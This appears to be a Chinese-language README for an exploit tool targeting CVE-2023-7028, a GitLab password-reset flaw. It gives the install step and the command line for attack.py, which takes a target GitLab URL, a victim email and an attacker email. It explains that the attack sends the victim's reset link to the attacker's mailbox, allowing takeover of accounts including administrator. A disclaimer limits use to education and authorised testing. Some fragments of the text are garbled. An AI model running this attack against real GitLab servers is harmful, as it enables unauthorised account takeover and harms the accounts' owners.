本仓库包含针对 CVE-2023-7028 的利用程序,这是 GitLab 中的一个严重漏洞,允许攻击者滥用密码重置功能并接管账户,包括管理员账户。
/users/password 端点requests 库pip install requests
python3 attack.py -u <gitlab_url> -t <target_email> -e <attacker_email>
示例:
python3 attack.py -u http://example.com -t [email protected] -e [email protected]
该利用程序会向受害者和攻击者的邮箱发送密码重置邮件。成功执行后,检查攻击者的邮箱以获取密码重置链接。
root)。本利用程序仅供教育及授权测试使用。
请负责任地使用此代码。未经授权访问系统是违法的。